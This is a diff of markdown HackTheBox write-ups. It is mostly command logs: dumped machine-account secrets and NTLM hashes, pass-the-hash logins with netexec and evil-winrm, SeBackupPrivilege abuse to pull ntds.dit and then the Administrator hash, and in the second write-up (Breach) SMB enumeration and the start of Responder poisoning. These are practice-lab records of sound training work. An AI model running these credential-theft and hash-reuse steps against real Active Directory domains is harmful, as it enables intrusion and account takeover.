260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d004800 -3a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a0028 -00620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d00 -48003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a -002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               username DC01$ -               password None -               password (hex) -username DWM-2 -               Username: DC01$ -               username DC01$ -               password None -               password (hex) -               Username: DC01$ -               Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d004800 -3a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a0028 -00620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d00 -48003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a -002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               username DC01$ -               password None -               password (hex) -username DC01$ -               Username: DC01$ -username DC01$ -               Username: DC01$ -username DC01$ -               Username: DC01$ -username LOCAL SERVICE -               Username:   -username UMFD-0 -               Username: DC01$ -               username DC01$ -               password None -               password (hex) -               Username: DC01$ -               Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d004800 -3a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a0028 -00620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d00 -48003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a -002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               username DC01$ -               password None -               password (hex) -username UMFD-0 -               Username: DC01$ -               username DC01$ -               password None -               password (hex) -               Username: DC01$ -               Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d004800 -3a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a0028 -00620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d00 -48003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a -002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               username DC01$ -               password None -               password (hex) -username UMFD-1 -               Username: DC01$ -               username DC01$ -               password None -               password (hex) -               Username: DC01$ -               Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d004800 -3a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a0028 -00620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d00 -48003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a -002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               username DC01$ -               password None -               password (hex) -username   -               Username: DC01$ -username DC01$ -               username DC01$ -               password None -               password (hex) -               Username: dc01$ -               username DC01$ -               password None -               password (hex) -``` - -We got a hash for the second outliar we'd found in the user list : `svc_backup`. - -We'll try `netexec` with `Pass-The-Hash` : - -```bash ->  nxc smb 10.129.229.17 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -nxc winrm 10.129.229.17 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -SMB         10.129.229.17   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:None) (Null Auth:True) -SMB         10.129.229.17   445    DC01             [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d   -WINRM       10.129.229.17   5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:BLACKFIELD.local)   -WINRM       10.129.229.17   5985   DC01             [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d (Pwn3d!) -``` - -And we got a shell ! - -```PowerShell ->  evil-winrm -i BLACKFIELD.local -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d - -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems -/usr/lib/ruby/3.4.0/readline.rb:4: warning: reline was loaded from the standard library, but will no longer be part of the default gems starting from Ruby 4.0.0. -You can add reline to your Gemfile or gemspec to silence this warning. -                                         -Evil-WinRM shell v3.9 -                                         -Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline -                                         -Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion -                                         -Info: Establishing connection to remote endpoint -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -*Evil-WinRM* PS C:\Users\svc_backup\Documents> type /Users/svc_backup/Desktop/user.txt -3920bb31*************4b543 -``` - -And the user flag. - -We check our `privileges` and `groups` on the shell : - -```PowerShell -*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /priv - -PRIVILEGES INFORMATION ----------------------- - -Privilege Name                Description                    State -============================= ============================== ======= -SeMachineAccountPrivilege     Add workstations to domain     Enabled -SeBackupPrivilege             Back up files and directories  Enabled -SeRestorePrivilege            Restore files and directories  Enabled -SeShutdownPrivilege           Shut down the system           Enabled -SeChangeNotifyPrivilege       Bypass traverse checking       Enabled -SeIncreaseWorkingSetPrivilege Increase a process working set Enabled -*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /groups - -GROUP INFORMATION ------------------ - -Group Name                                 Type             SID          Attributes -========================================== ================ ============ ================================================== -Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group -BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group -BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group -BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group -BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group -NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group -NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group -NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group -NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group -Mandatory Label\High Mandatory Level       Label            S-1-16-12288 -``` - -We have the `SeBackupPrivilege`. We use `/B` to `shadowcopy` the files into `\Temp\` on shell, then we download the files using `netexec` : - -```PowerShell -*Evil-WinRM* PS C:\Windows\Temp> download ntds.dit /tmp/blackfield_ntds.dit -  -                                         -Info: Downloading C:\Windows\Temp\ntds.dit to /tmp/blackfield_ntds.dit -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -                                         -Info: Download successful! - -*Evil-WinRM* PS C:\Windows\Temp> download system.bak /tmp/blackfield_system.bak -  -                                         -Info: Downloading C:\Windows\Temp\system.bak to /tmp/blackfield_system.bak -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -                                         -Info: Download successful! -``` - -```bash -nxc smb 10.129.229.17 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d --get-file 'Windows/Temp/ntds.dit' /tmp/blackfield_ntds.dit 2>&1; nxc smb 10.129.229.17 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d --get-file 'Windows/Temp/system.bak' /tmp/blackfield_system.bak 2>&1; ls -la /tmp/blackfield_ntds.dit /tmp/blackfield_system.bak -``` - -We use `Impacket`'s `secretsdump` with `svc_backup`'s hash and we get the Administrator hash, we use `Pass-The-Hash` : - -```bash ->  evil-winrm -i 10.129.229.17 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee - -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems -/usr/lib/ruby/3.4.0/readline.rb:4: warning: reline was loaded from the standard library, but will no longer be part of the default gems starting from Ruby 4.0.0. -You can add reline to your Gemfile or gemspec to silence this warning. -                                         -Evil-WinRM shell v3.9 -                                         -Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline -                                         -Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion -                                         -Info: Establishing connection to remote endpoint -*Evil-WinRM* PS C:\Users\Administrator\Documents> type /Users/Administrator/Desktop/root.txt -437***************955cb -``` - -And we got root. diff --git a/Breach HTB [MEDIUM].md b/Breach HTB [MEDIUM].md deleted file mode 100644 index 429b75d..0000000 --- a/Breach HTB [MEDIUM].md +++ /dev/null @@ -1,1224 +0,0 @@ -Target : 10.129.2.189 - -Date : 24/06/2026 - -Only information given in Adventure Mode (Black Box mode in HTB) : 'The User flag for this Box is located in a non-standard directory, C:\share\transfer.' - -```bash ->  echo "10.129.2.189 breach.htb" | sudo tee /etc/hosts -10.129.2.189 breach.htb ->  nmap -Pn -sV -sC -O -p- --min-rate=2500 10.129.2.189 -Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-24 14:22 +0200 -Stats: 0:00:25 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan -SYN Stealth Scan Timing: About 47.99% done; ETC: 14:23 (0:00:28 remaining) -Nmap scan report for breach.htb (10.129.2.189) -Host is up (0.064s latency). -Not shown: 65514 filtered tcp ports (no-response) -PORT      STATE SERVICE       VERSION -53/tcp    open  domain        Simple DNS Plus -80/tcp    open  http          Microsoft IIS httpd 10.0 -|_http-title: IIS Windows Server -|_http-server-header: Microsoft-IIS/10.0 -| http-methods:   -|_  Potentially risky methods: TRACE -88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-05-24 12:24:31Z) -135/tcp   open  msrpc         Microsoft Windows RPC -139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn -389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: breach.vl, Site: Default-First-Site-Name) -445/tcp   open  microsoft-ds? -464/tcp   open  kpasswd5? -593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0 -636/tcp   open  tcpwrapped -1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM -|_ssl-date: 2026-05-24T12:26:10+00:00; 0s from scanner time. -| ms-sql-info:   -|   10.129.2.189:1433:   -|     Version:   -|       name: Microsoft SQL Server 2019 RTM -|       number: 15.00.2000.00 -|       Product: Microsoft SQL Server 2019 -|       Service pack level: RTM -|       Post-SP patches applied: false -|_    TCP port: 1433 -| ms-sql-ntlm-info:   -|   10.129.2.189:1433:   -|     Target_Name: BREACH -|     NetBIOS_Domain_Name: BREACH -|     NetBIOS_Computer_Name: BREACHDC -|     DNS_Domain_Name: breach.vl -|     DNS_Computer_Name: BREACHDC.breach.vl -|     DNS_Tree_Name: breach.vl -|_    Product_Version: 10.0.20348 -| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback -| Not valid before: 2026-05-24T12:20:08 -|_Not valid after:  2056-05-24T12:20:08 -3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: breach.vl, Site: Default-First-Site-Name) -3269/tcp  open  tcpwrapped -3389/tcp  open  ms-wbt-server Microsoft Terminal Services -| ssl-cert: Subject: commonName=BREACHDC.breach.vl -| Not valid before: 2026-05-23T12:17:24 -|_Not valid after:  2026-11-22T12:17:24 -| rdp-ntlm-info:   -|   Target_Name: BREACH -|   NetBIOS_Domain_Name: BREACH -|   NetBIOS_Computer_Name: BREACHDC -|   DNS_Domain_Name: breach.vl -|   DNS_Computer_Name: BREACHDC.breach.vl -|   DNS_Tree_Name: breach.vl -|   Product_Version: 10.0.20348 -|_  System_Time: 2026-05-24T12:25:30+00:00 -|_ssl-date: 2026-05-24T12:26:10+00:00; 0s from scanner time. -5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) -|_http-server-header: Microsoft-HTTPAPI/2.0 -|_http-title: Not Found -9389/tcp  open  mc-nmf        .NET Message Framing -49664/tcp open  msrpc         Microsoft Windows RPC -49669/tcp open  msrpc         Microsoft Windows RPC -49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0 -50020/tcp open  msrpc         Microsoft Windows RPC -54567/tcp open  msrpc         Microsoft Windows RPC -Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port -Device type: general purpose -Running (JUST GUESSING): Microsoft Windows 2022|10|11|2012|2016 (89%) -OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_11 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016 -Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows 10 1703 or Windows 11 21H2 - 23H2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%) -No exact OS matches for host (test conditions non-ideal). -Service Info: Host: BREACHDC; OS: Windows; CPE: cpe:/o:microsoft:windows - -Host script results: -| smb2-time:   -|   date: 2026-05-24T12:25:32 -|_  start_date: N/A -| smb2-security-mode:   -|   3.1.1:   -|_    Message signing enabled and required -``` - -So, we got a SQL Server on port 1433 `name: Microsoft SQL Server 2019 RTM` with domain names `BREACHDC.breach.vl` and `breach.vl`, target/computer name : `BREACH` ; -Windows Active Directory LDAP ports 389 and 3268 open, port 53 (DNS) and port 80 (http) open, port 445 smb2 3.1.1 and port 88 (Kerberos) as the main ports. Netbios is also open on port 139 and Windows RPC is open on multiple ports, although one is open through rpc over HTTP 1.0 : `tcp/49677`. - -```bash ->  echo "10.129.2.189 BREACHDC.breach.vl breach.vl" | sudo tee -a /etc/hosts -Please touch the FIDO authenticator. -10.129.2.189 BREACHDC.breach.vl breach.vl ->  smbclient -N -L //10.129.2.189 - -       Sharename       Type      Comment -       ---------       ----      ------- -       ADMIN$          Disk      Remote Admin -       C$              Disk      Default share -       IPC$            IPC       Remote IPC -       NETLOGON        Disk      Logon server share   -       share           Disk        -       SYSVOL          Disk      Logon server share   -       Users           Disk        -SMB1 disabled -- no workgroup available -``` - -With such a big attack surface, it'd be easy to fall into rabbit holes. We'll start with SMB but will be cautious. - -```bash ->  smbclient -N //10.129.2.189/share -c 'recurse ON; ls transfer\*' - - .                                   D        0  Mon Sep  8 12:13:44 2025 - ..                                  D        0  Mon Sep  8 13:13:00 2025 - claire.pope                         D        0  Thu Feb 17 12:21:35 2022 - diana.pope                          D        0  Thu Feb 17 12:21:19 2022 - julia.wong                          D        0  Thu Apr 17 02:38:12 2025 - -\transfer\claire.pope -NT_STATUS_ACCESS_DENIED listing \transfer\claire.pope\* - -\transfer\diana.pope -NT_STATUS_ACCESS_DENIED listing \transfer\diana.pope\* - -\transfer\julia.wong -NT_STATUS_ACCESS_DENIED listing \transfer\julia.wong\* - ->  netexec smb 10.129.2.189 -u '' -p '' -SMB         10.129.2.189    445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:None) (Null Auth:True) -SMB         10.129.2.189    445    BREACHDC         [+] breach.vl\: - ->  printf 'write_test_%s\n' "$(date +%s)" > /tmp/write_test.txt && smbclient -N //10.129.2.189/share -c 'cd transfer; put /tmp/write_test.txt' - -NT_STATUS_OBJECT_PATH_NOT_FOUND opening remote file \transfer\tmp\write_test.txt - ->  smbclient -L //10.129.2.189 -U% - -       Sharename       Type      Comment -       ---------       ----      ------- -SMB1 disabled -- no workgroup available -``` - -It seems the SMB access is closed off unless we have credentials. - -```bash ->  nxc smb 10.129.2.189 -u guest -p '' --shares - -SMB         10.129.2.189    445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:None) (Null Auth:True) -SMB         10.129.2.189    445    BREACHDC         [+] breach.vl\guest:   -SMB         10.129.2.189    445    BREACHDC         [*] Enumerated shares -SMB         10.129.2.189    445    BREACHDC         Share           Permissions     Remark -SMB         10.129.2.189    445    BREACHDC         -----           -----------     ------ -SMB         10.129.2.189    445    BREACHDC         ADMIN$                          Remote Admin -SMB         10.129.2.189    445    BREACHDC         C$                              Default share -SMB         10.129.2.189    445    BREACHDC         IPC$            READ            Remote IPC -SMB         10.129.2.189    445    BREACHDC         NETLOGON                        Logon server share   -SMB         10.129.2.189    445    BREACHDC         share           READ,WRITE        -SMB         10.129.2.189    445    BREACHDC         SYSVOL                          Logon server share   -SMB         10.129.2.189    445    BREACHDC         Users           READ -``` - -We at least got a list of shares, but totally unnaccessible for us, except for `share` which has `READ, WRITE` permissions for user `guest`, and also IPC$ and Users that has `READ` permissions for that user. - -```bash ->  printf 'write_test_%s\n' "$(date +%s)" > /tmp/write_test.txt && smbclient -N //10.129.2.189/share -c 'cd transfer; lcd /tmp; put write_test.txt write_test.txt; ls' - -putting file write_test.txt as \transfer\write_test.txt (0.1 kB/s) (average 0.1 kB/s) - .                                   D        0  Sun May 24 15:12:31 2026 - ..                                  D        0  Sun May 24 15:09:51 2026 - claire.pope                         D        0  Thu Feb 17 12:21:35 2022 - diana.pope                          D        0  Thu Feb 17 12:21:19 2022 - julia.wong                          D        0  Thu Apr 17 02:38:12 2025 - write_test.txt                      A       22  Sun May 24 15:12:31 2026 - -               7863807 blocks of size 4096. 1562240 blocks available -                -smbclient -N //10.129.2.189/share -c 'cd transfer; del write_test.txt; ls' - - .                                   D        0  Sun May 24 15:14:34 2026 - ..                                  D        0  Sun May 24 15:09:51 2026 - claire.pope                         D        0  Thu Feb 17 12:21:35 2022 - diana.pope                          D        0  Thu Feb 17 12:21:19 2022 - julia.wong                          D        0  Thu Apr 17 02:38:12 2025 - -               7863807 blocks of size 4096. 1562264 blocks available -``` - -So we can indeed write into `/share`. - -```bash ->  sudo responder -I tun1 -dwv - -Please touch the FIDO authenticator. -                                        __ - .----.-----.-----.-----.-----.-----.--|  |.-----.----. - |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _| - |__| |_____|_____|   __|_____|__|__|_____||_____|__| -                  |__| - - -[*] Tips jar: -   USDT -> 0xCc98c1D3b8cd9b717b5257827102940e4E17A19A -   BTC  -> bc1q9360jedhhmps5vpl3u05vyg4jryrl52dmazz49 - -[+] Poisoners: -   LLMNR                      [ON] -   NBT-NS                     [ON] -   MDNS                       [ON] -   DNS                        [ON] -   DHCP                       [ON] -   DHCPv6                     [OFF] - -[+] Servers: -   HTTP server                [ON] -   HTTPS server               [ON] -   WPAD proxy                 [ON] -   Auth proxy                 [OFF] -   SMB server                 [ON] -   Kerberos server            [ON] -   SQL server                 [ON] -   FTP server                 [ON] -   IMAP server                [ON] -   POP3 server                [ON] -   SMTP server                [ON] -   DNS server                 [ON] -   LDAP server                [ON] -   MQTT server                [ON] -   RDP server                 [ON] -   DCE-RPC server             [ON] -   WinRM server               [ON] -   SNMP server                [ON] - -[+] HTTP Options: -   Always serving EXE         [OFF] -   Serving EXE                [OFF] -   Serving HTML               [OFF] -   Upstream Proxy             [OFF] - -[+] Poisoning Options: -   Analyze Mode               [OFF] -   Force WPAD auth            [OFF] -   Force Basic Auth           [OFF] -   Force LM downgrade         [OFF] -   Force ESS downgrade        [OFF] - -[+] Generic Options: -   Responder NIC              [tun1] -   Responder IP               [10.10.14.12] -   Responder IPv6             [fe80::ee8e:bd93:cdc3:3a65] -   Challenge set              [random] -   Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL'] -   Don't Respond To MDNS TLD  ['_DOSVC'] -   TTL for poisoned response  [default] - -[+] Current Session Variables: -   Responder Machine Name   